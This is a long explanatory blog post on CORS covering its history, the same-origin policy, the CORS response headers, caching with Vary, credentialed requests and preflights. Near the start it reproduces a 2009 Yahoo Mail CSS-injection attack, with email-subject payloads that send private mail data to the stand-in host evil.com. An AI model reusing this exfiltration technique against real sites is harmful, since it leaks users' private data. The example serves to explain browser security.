How to win at CORS
CORS (Cross-Origin Resource Sharing) is hard. It's hard because it's part of how browsers fetch stuff, and that's a set of behaviours that started with the very first web browser over thirty years ago. Since then, it's been a constant source of development; adding features, improving defaults, and papering over past mistakes without breaking too much of the web.
Anyway, I figured I'd write down pretty much everything I know about CORS, and to make things interactive, I built an exciting new app:
You can dive right into the playground now if you want, but I'll link to it throughout the article to demonstrate particular examples.
Anyway, I'm getting ahead of myself. Before I get to any of the 'how', I'm going to try to explain why CORS is the way it is, by looking at how it came into existence, and how it fits into other kinds of fetches. Wish me luck…
Cross-origin access without CORS
I'd like to propose a new, optional HTML tag: IMG. Required argument is SRC="url".
– Marc Andreessen in 1993
Browsers have been able to include images from other sites for almost 30 years. You don't need the other site's permission to do this, you can just do it. And it didn't stop with images:
<script src="…"></script>
<link rel="stylesheet" href="…" />
<iframe src="…"></iframe>
<video src="…"></video>
<audio src="…"></audio>
APIs like these let you make a request to another website and process the response in a particular way, without the other site's consent.
This started getting complicated in 1994 with the advent of HTTP cookies. HTTP cookies became part of a set of things we call credentials, which also includes TLS client certificates (not to be confused with server certificates), and the state that automatically goes in the Authorization
request header when using HTTP authentication (if you've never heard of this, don't worry, it's shite).
Credentials allow the server to maintain state about a particular user across multiple requests. It's how Twitter shows you your feed, it's how your bank shows you your accounts.
When you request other-site content using one of the methods above, it sends along the credentials for the other-site. And over the years that's created a colossal sackload of security issues.
<img src="https://your-bank/your-profile/you.jpg" />
If the above image loads, I get a load
event. If it doesn't load, I get an error
event. If that differs depending on if you're logged in or not, that tells me a lot about you. I can also read the width and height of the image, which, if it differs from user to user, tells me even more.
This gets worse with a format like CSS, which has more capabilities, but doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including ');}
, and later another with a subject including {}html{background:url('//evil.com/?
:
…
<li class="email-subject">Hey {}html{background:url('//evil.com/?</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">Yo ');}</li>
…
This means some of the user's private email data is sandwiched between something that will parse as a valid bit of CSS. Then, the attacker convinces the user to visit a page containing:
<link rel="stylesheet" href="https://m.yahoo.com/mail" />
…which is loaded using yahoo.com
's cookies, the CSS parses, and sends private information to evil.com
. Oh no.
And that's just the tip of the shitberg. From browser bugs to CPU exploits, these leaky resources have given us decades of problems.
Locking things down
It's become pretty clear that the above was a mistake in the design of the web, so we no longer create APIs that can process these kinds of requests. Meanwhile, we've spent the last few decades patching things up as best we can:
- CSS from another origin (I'll get to a definition of 'origin' shortly) now needs to be sent with a CSS
Content-Type
. Unfortunately we can't enforce the same thing for scripts and images, or CSS on quirks mode pages, without breaking significant portions of the web. - The
X-Content-Type-Options: nosniff
header lets the server say "hey, don't allow this to be parsed as CSS or JS unless I've sent the rightContent-Type
". - Later, the
nosniff
rules were expanded to prevent particular no-CORS response types from another origin, such as HTML, JSON, and XML (except SVG). This protection is called CORB. - More recently, we don't send cookies along with the request from site-A to site-B, unless site-B has opted-in using the
SameSite
cookie attribute. Without cookies, the site generally returns the 'logged-out' view, without private data. - Firefox and Safari go a step further, and try to fully isolate sites, although how this works is currently pretty different between the two.
The same-origin policy
Back in 1995, Netscape 2 landed with two amazing new features: LiveScript (you probably know this better as 'JavaScript'), and HTML frames. Frames let you embed one page in another, and LiveScript could interact with both pages.
Netscape realised that this presented a security issue; you don't want an evil page to be able to read the DOM of your banking page, so they decided that cross-frame scripting would only be allowed if both pages had the same origin.
https://jakearchibald.com:443/2021/blah/?foo#barThe origin
The idea was that sites on the same origin are more likely to have the same owner. That wasn't completely true, since a lot of sites divided content by URLs such as http://example.com/~jakearchibald/
, but the line had to be drawn somewhere.
From that point, features that granted deep visibility into a resource were limited to same-origin. This included new ActiveXObject('Microsoft.XMLHTTP')
which first appeared in IE5 in 1999, and later became the web standard XMLHttpRequest
.
Origins vs sites
Some web features don't deal with origins, they deal with 'sites'. For instance, https://help.yourbank.com
and https://profile.yourbank.com
are different origins, but they're the same site. Cookies are the most common feature that operate at a site level, as you can create cookies that are sent to all subdomains of yourbank.com
.
But how does the browser know that https://help.yourbank.com
and https://profile.yourbank.com
are part of the same site, but https://yourbank.co.uk
and https://jakearchibald.co.uk
are different sites? I mean… they all have three parts separated by dots.
Well, the answer was a bunch of heuristics in each browser, but in 2007 Mozilla swapped their heuristics for a list. That list is now maintained as a separate community project known as the public suffix list, and it's used by all browsers and many other projects.
If someone says they understand the security implications of URLs without UI hints, be sure to check they can recite all 9000+ entries of the public suffix list from memory.
So https://app.jakearchibald.com
and https://other-app.jakearchibald.com
are part of the same site, but https://app.glitch.me
and https://other-app.glitch.me
are different sites. These cases are different because glitch.me
is on the public suffix list whereas jakearchibald.com
is not. This is 'correct', because different people 'own' the subdomains of glitch.me
, whereas I own all the subdomains of jakearchibald.com
.
Opening things up again
Ok, so we've got these APIs like <img>
that can access resources from other origins, but visibility into the response is limited (but not limited enough in hindsight), and we've got these more powerful APIs like cross-frame scripting and XMLHttpRequest
which only work same-origin.
How could we allow those more powerful APIs to work across origins?
Remove credentials?
Let's say we provide an opt-in so the request is sent without credentials. The response will be the 'logged-out' view, so it won't contain any private data, and can be revealed without concern, right?
Unfortunately there're a lot of HTTP endpoints out there that 'secure' themselves using things other than browser credentials.
A lot of company intranets assume they're 'private' because they're only accessible from a particular network. Some routers and IoT devices assume they're only accessible by well-meaning folks because they're restricted to your home network (remember, the 's' in 'IoT' stands for security). Some websites offer different content depending on the IP address they're accessed from.
So, if you visit my website from your home, I could start making requests to common hostnames and IP addresses, looking for insecure IoT devices, looking for routers using default passwords, and generally make your life very miserable, all without needing browser credentials.
Removing credentials is part of the solution, but it isn't enough on its own. There's no way to know that a resource contains private data, so we need some way for the resource to declare "hey, it's fine, let the other site read my content".
Separate resource opt-in?
The origin could have some special resource that details its permissions regarding cross-origin access. That's the security model Flash went with. Flash looked for a /crossdomain.xml
in the root of the site that looked like this:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "https://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*.example.com" />
<allow-access-from domain="www.example.com" />
<allow-http-request-headers-from domain="*.adobe.com" headers="SOAPAction" />
</cross-domain-policy>
There are a few issues with this:
- It changes the behaviour for the whole origin. You can imagine a similar format that lets you specify rules for particular resources, but the
/crossdomain.xml
resource would start to get quite large. - You end up with two requests, one for the
/crossdomain.xml
, and one for the actual resource. This becomes more of an issue the bigger/crossdomain.xml
gets. - For larger sites built by multiple teams, you end up with issues over ownership of
/crossdomain.xml
.
In-resource opt-in?
To cut down the number of requests, the opt-in could be granted within the resource itself. This technique was proposed by the W3C Voice Browser Working Group back in 2005, using an XML processing instruction:
<?access-control allow="*.example.com" deny="*.visitors.example.com"?>
But what if the resource wasn't XML? Well, the opt-in would need to be in a different format.
This is kinda where things landed for frame-to-frame communication. Both sides opt-in using postMessage
, and can declare the origin they're happy to communicate with.
But what about accessing the raw bytes of the resource? In that case it doesn't make sense to use resource-specific metadata for the opt-in. And besides, HTTP already has a place for resource metadata…
HTTP header opt-in
The proposal by the Voice Browser Working Group was generalised using HTTP headers, and that became Cross-Origin Resource Sharing, or CORS.
Access-Control-Allow-Origin: *
Making a CORS request
Most modern web features require CORS by default, such as fetch()
. The exception is modern features that are designed to support older features that don't use CORS, e.g., <link rel="preload">
.
Unfortunately there's no easy rule for what does and doesn't require CORS. For example:
<!-- Not a CORS request -->
<script src="https://example.com/script.js"></script>
<!-- CORS request -->
<script type="module" src="https://example.com/script.js"></script>
The best way to figure it out is to try it and look at network DevTools. In Chrome and Firefox, cross-origin requests are sent with a Sec-Fetch-Mode
header which will tell you if it's a CORS request or not. Unfortunately Safari hasn't implemented this yet.
Try it in the CORS playground - When you make the request, it'll log the headers the server received. If you're using Chrome or Firefox you'll see Sec-Fetch-Mode
set to cors
in there, along with some other interesting Sec-
headers. However, if you make a no-CORS request, Sec-Fetch-Mode
will be no-cors
.
If an HTML element causes a no-CORS fetch, you can use the badly-named crossorigin
attribute to switch it to a CORS request.
<img crossorigin src="…" />
<script crossorigin src="…"></script>
<link crossorigin rel="stylesheet" href="…" />
<link crossorigin rel="preload" as="font" href="…" />
When you switch these over to CORS, you get more visibility into the cross-origin resource:
- You can paint the
<img>
to a<canvas>
and read back the pixels. - You get more detailed stack traces for script in particular weird cases.
- You get extra features like subresource integrity.
- You can explore the parsed stylesheet via
link.sheet
.
With <link rel="preload">
, you need to ensure it uses CORS if the eventual request will also use CORS, otherwise it won't match in the preload cache, and you'll end up with two requests.
CORS requests
By default, a cross-origin CORS request is made without credentials. So, no cookies, no client certs, no automatic Authorization
header, and Set-Cookie
on the response is ignored. However, same-origin requests include credentials.
By the time CORS was developed, the Referer
header was frequently spoofed or removed by browser extensions and 'internet security' software, so a new header, Origin
, was created, which provides the origin of the page that made the request.
Origin
is generally useful, so it's been added to lots of other types of request, such as WebSocket and POST
requests. Browsers tried adding it to regular GET
requests too, but it broke a bunch of sites that assumed the presence of the Origin
header means it's a CORS request 😬. Maybe one day.
Try it in the CORS playground - When you make the request, it'll log the headers the server received, which will include Origin
. If you make a no-CORS GET
request, the Origin
header isn't sent, but it appears again if you make a no-CORS POST
request.
CORS responses
To pass the CORS check and give the other origin access to the response, the response must include this header:
Access-Control-Allow-Origin: *
The *
can be replaced with the value of the request's Origin
header, but *
works for any requesting origin provided the request is sent without credentials (more on that in a bit). As with all headers, the header name is case-insensitive, but the value is case sensitive.
Try it in the CORS playground! The following values work:
Whereas the following do not work, as the only accepted values are *
and the exact case-sensitive value of the request's Origin
header:
https://jakearchibald.com/
- the trailing/
means it doesn't match theOrigin
header.https://JakeArchibald.com
- the casing doesn't match theOrigin
header.https://jakearchibald.*
- nah, wildcards don't work like that here.https://jakearchibald.com, https://example.com
- only one value can be provided.
A valid value gives the other origin access to the response body, and also a subset of the headers:
Cache-Control
Content-Language
Content-Length
Content-Type
Expires
Last-Modified
Pragma
The response can include another header, Access-Control-Expose-Headers
, to reveal additional headers:
Access-Control-Expose-Headers: Custom-Header-1, Custom-Header-2
The matching is case-insensitive since header names are case-insensitive. You can also use:
Access-Control-Expose-Headers: *
…to expose (almost) all the headers, if the request is sent without credentials (more on that in a bit).
The Set-Cookie
and Set-Cookie2
(a deprecated failed 'sequel' to Set-Cookie
) headers are never exposed, to avoid leaking cookies across sites.
Try it in the CORS playground:
CORS and caching
A CORS request doesn't bypass caches. Firefox partitions its HTTP cache according to whether the request has credentials, and Chrome plans to do the same, but you still have CDN caches to worry about.
Adding CORS to a long-caching resource
If you have assets with a long cache lifetime, you might be used to changing the file name when the content changes, so users pick up the new content. Well, the same thing applies when it comes to header changes.
If you add Access-Control-Allow-Origin: *
to a resource with a long cache lifetime, be sure to change the URL so clients go back to your server and pick up the new header, rather than reuse a cached version without the header.
If you don't feel like I'm taking up enough of your time, I have an article that covers long-term caching in detail.
Conditionally serving CORS headers
If a resource contains private data when it's requested with cookies, but you only want to expose the without-cookies data, then it's best to only include the Access-Control-Allow-Origin: *
header if the request doesn't have a Cookie
header. This avoids accidental cases where a CDN or browser cache reuses a response containing private data:
- The browser fetches a resource without CORS, so the request includes cookies.
- The response, containing private data, goes into a cache.
- The browser makes a CORS fetch for the same resource, so it doesn't include cookies.
- The cache returns the same response as before.
In this case, the browser didn't send cookies along with the second request, but it received a response that contains private data due to some cookies sent with a previous request. You don't want this passing a CORS check and revealing private data.
But the above 'bug' only happens if another important instruction is missing from the headers:
Vary: Cookie
This means "you can only serve a cached version of this if the state of the Cookie
header matches the original request". You should include that on all responses to the URL, whether the request has a Cookie
header or not.
I've also seen some services add Access-Control-Allow-Origin: *
conditionally depending on whether the request looks like a CORS request or not, using the presence of the Origin
header as a rough signal. This is unnecessary complication, but if you insist on doing this, it's important again to use the right Vary
header:
Vary: Origin
A lot of popular "cloud storage" hosts get this wrong. They add CORS headers conditionally, and don't include the Vary
header. Don't trust their defaults, check they're actually doing the right thing.
Vary
can list many headers to use as conditions, so if you're adding Access-Control-Allow-Origin: *
depending on the presence of the Origin
and Cookie
headers, then use:
Vary: Origin, Cookie
Is it safe to expose resources via CORS?
If a resource never contains private data, then it's totally safe to put Access-Control-Allow-Origin: *
on it. Do it! Do it now!
If a resources sometimes contains private data depending on cookies, it's safe to add Access-Control-Allow-Origin: *
as long as you also include a Vary: Cookie
header.
Finally, if you're 'securing' the data using things like the sender's IP address, or by assuming you're safe because your server is limited to an 'internal' network, it isn't safe to use Access-Control-Allow-Origin: *
at all. But also, arghh, stop doing that! The data isn't actually secure. Platform apps will be able to get at that data and send it wherever they want.
Adding credentials
Cross-origin CORS requests are made without credentials by default. However, various APIs will allow you to add the credentials back in.
With fetch:
const response = await fetch(url, {
credentials: 'include',
});
Or with HTML elements:
<img crossorigin="use-credentials" src="…" />
However, this makes the opt-in stronger. The response must contain:
Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://jakearchibald.com Vary: Cookie, Origin
If the CORS request includes credentials, the response must include the Access-Control-Allow-Credentials: true
header, and the value of Access-Control-Allow-Origin
must reflect the request's Origin
header (*
isn't an acceptable value if the request has credentials).
The opt-in is stronger because, well, exposing private data is risky, and should only be done for origins you really trust.
The same-site rules around cookies still apply, as do the kinds of isolation we see in Firefox and Safari. But these only come into effect cross-site, not cross-origin.
It's important to use the Vary
header in this case if your response is cacheable in any way. And not just by the browser, but also intermediate things like a CDN. Use Vary
to tell browsers and intermediates that the response is different depending on particular request headers, else the user might end up with a response with the wrong Access-Control-Allow-Origin
value.
Try it in the CORS playground - This request meets all the criteria, and also sets a cookie. If you make the request a second time, you'll see the cookie being sent back.
Unusual requests and preflights
So far, the response has been opting into exposing its data. All of the requests have been assumed to be safe, because they're not doing anything unusual.
fetch(url, { credentials: 'include' });
There's nothing unusual about the above, because the request is really similar to what an <img>
can already do.
fetch(url, {
method: 'POST',
body: formData,
});
There's nothing unusual about the above, because the request is really similar to what a <form>
can already do.
fetch(url, {
method: 'wibbley-wobbley',
credentials: 'include',
headers: {
fancy: 'headers',
'here-we': 'go',
},
});
Ok, that's pretty unusual.
What counts as 'unusual' is pretty complicated, but at a high level, if it's the kind of request that other browser APIs don't generally make, then it's unusual. At a lower level, if the request method isn't GET
, HEAD
, or POST
, or it includes headers or header values that aren't part of the safelist, then it counts as unusual. In fact, I made a change to this part of the spec recently to add particular Range
headers to this list.
If you try to make an unusual request, the browser first asks the other origin if it's ok to send it. This process is called a preflight.
Preflight request
Before making the main request, the browser makes a preflight request to the destination URL with a method of OPTIONS
, and headers like this:
Access-Control-Request-Method: wibbley-wobbley Access-Control-Request-Headers: fancy, here-we
Access-Control-Request-Method
- The HTTP method that the main request will use. This is included even if the method isn't unusual.Access-Control-Request-Headers
- The unusual headers that the main request will use. If there are no unusual headers, this header isn't sent.
The preflight request never includes credentials, even if the main request will.
Preflight response
The server responds to indicate whether it's happy for the main request to go ahead, using headers like this:
Access-Control-Max-Age: 600 Access-Control-Allow-Methods: wibbley-wobbley Access-Control-Allow-Headers: fancy, here-we
Access-Control-Max-Age
- The number of seconds to cache this preflight response, to avoid the need for further preflights to this URL. The default is 5 seconds. Some browsers have an upper-limit on this. In Chrome it's 600 (10 minutes), and in Firefox it's 86400 (24 hours).Access-Control-Allow-Methods
- The unusual methods to allow. This can be a comma-separated list, and values are case-sensitive. If the main request is to be sent without credentials, this can be*
to allow (almost) any method. You can't allowCONNECT
,TRACE
, orTRACK
as these are on a 🔥💀 FORBIDDEN LIST 💀🔥 for security reasons.Access-Control-Allow-Headers
- The unusual headers to allow. This can be a comma-separated list, and values are case-insensitive since header names are case-insensitive. If the main request is to be sent without credentials, this can be*
to allow any header that isn't on a 🔥💀 DIFFERENT FORBIDDEN LIST 💀🔥.
Headers in the 🔥💀 FORBIDDEN LIST 💀🔥 are headers that must remain in the browser's control for security reasons. They're automatically (and silently) stripped from CORS requests and Access-Control-Allow-Headers
.
The preflight response must also pass a regular CORS check, so it needs Access-Control-Allow-Origin
, and also Access-Control-Allow-Credentials: true
if the main request is to be sent with credentials, and the status code must be between 200-299 inclusive.
If the intended method is allowed, and all the intended headers are allowed, then the main request goes ahead.
Oh, and the preflight only gives the go-ahead for the request. The eventual response must also pass a CORS check.
The status code restriction creates a bit of a gotcha. If you have an API like /artists/Pip-Blom
, you might want to return a 404 if 'Pip Blom' isn't in the database. You want the 404 code (and the response body) to be visible, so the client knows they requested something that was 'not found', rather than some other kind of server error. But if the request requires a preflight, the preflight must return a 200-299 code, even if the eventual response is going to be 404.
There's a Chrome bug with method names
Chrome has a bug here that I didn't know about until writing this post.
HTTP method names are somewhat case sensitive. I say 'somewhat' because if you use a method name that's a case-insensitive match for get
, post
, head
, delete
, options
, or put
then it's automatically uppercased, but other methods maintain the casing you use.
Unfortunately, Chrome expects the value to be uppercased in Access-Control-Allow-Methods
. If your method is Wibbley-Wobbley
and the preflight responds with:
Access-Control-Allow-Methods: Wibbley-Wobbley
…it'll fail the check in Chrome. Whereas:
Access-Control-Allow-Methods: WIBBLEY-WOBBLEY
…will pass the check in Chrome (and it'll make the request with the Wibbley-Wobbley
method), but it'll fail in other browsers which are following the spec. To work around it, you can provide both methods:
Access-Control-Allow-Methods: Wibbley-Wobbley, WIBBLEY-WOBBLEY
…or just use *
if it's a request without credentials.
Ok, let's put all of that together, for one last time, in the CORS playground:
- A simple request. This doesn't require a preflight.
- An unusual header. This triggers a preflight, and the server doesn't allow the request.
- An unusual header, again, but this time the preflight is correctly configured, so the request goes through.
- A normal
Range
header. This relates to the spec change I made. When browsers implement the change, this request won't need a preflight. It's currently implemented in Chrome Canary. - An unusual method. This highlights the Chrome bug documented above. The request won't go through in Chrome, but it'll work in other browsers.
- An unusual method, again. This works around the Chrome bug.
Phew!
Whoa, you made it to the end! Sorry, this post ended up way longer than I intended, but I hope it helps make sense of the whole CORS thing.
A huge thanks to Anne van Kesteren, Simon Pieters, Thomas Steiner, Ethan, Mathias Bynens, Jeff Posnick, and Matt Hobbs for proof-reading, fact-checking, and spotting bits that needed more detail.